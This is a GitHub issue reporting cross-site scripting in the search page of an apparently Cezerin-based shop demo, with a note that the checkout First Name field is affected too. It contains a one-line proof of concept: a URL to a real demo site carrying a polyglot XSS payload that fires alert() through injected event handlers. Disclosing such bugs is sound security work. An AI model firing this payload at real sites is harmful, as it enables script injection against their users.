Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[XSS]: XSS on search #510

Open
Baker68 opened this issue Jun 28, 2022 · 0 comments
Open

[XSS]: XSS on search #510

Baker68 opened this issue Jun 28, 2022 · 0 comments
Assignees
Labels
bug Something isn't working

Comments

@Baker68
Copy link

Baker68 commented Jun 28, 2022

PoC :

https://plusha.cezerin.net/search?search=jaVasCript:/*-/*`/*\`/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0D%0A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E\x3csVg/%3CsVg/oNloAd=alert()//%3E\x3e

Same issue is present on First Name checkout input fields.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

2 participants